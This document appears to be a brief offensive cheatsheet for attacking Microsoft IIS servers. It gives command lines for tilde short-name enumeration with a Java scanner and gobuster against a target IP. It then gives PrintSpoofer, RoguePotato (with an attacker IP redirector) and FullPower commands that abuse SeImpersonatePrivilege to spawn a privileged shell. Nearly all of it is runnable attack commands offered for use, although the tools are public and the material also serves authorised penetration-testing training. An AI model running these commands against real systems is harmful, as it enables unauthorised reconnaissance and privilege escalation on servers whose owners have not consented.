IIS
A cheatsheet for targeting Windows IIS vulnerabilities, including tilde enumeration for hidden paths and abusing SeImpersonatePrivilege for privilege escalation.
Author: BobBuilder
Tilde Enumeration
Windows IIS may expose 8.3 short names for files/folders via malformed HTTP requests:
-
longname.txt→longna~1.txt - Useful to enumerate hidden/forbidden paths
Automated Scanner
java -jar iis_shortname_scanner.jar 0 5 http://<target_ip>/
java -jar iis_shortname_scanner.jar 2 20 http://<target_ip>/
Gobuster Brute Force
gobuster dir -u http://<target_ip>/ -w list.txt -x .aspx,.asp
SeImpersonatePrivilege Abuse
Overview
IIS users often run under accounts with SeImpersonatePrivilege.
Privilege Escalation Tools
PrintSpoofer
PrintSpoofer.exe -i -c cmd
RoguePotato / GodPotato / JuicyPotatoNG
RoguePotato.exe -r <attacker_ip> -p <port> -t <clsid> -e cmd.exe
FullPower (Enable Privilege)
.\FullPower.exe --enable SeImpersonatePrivilege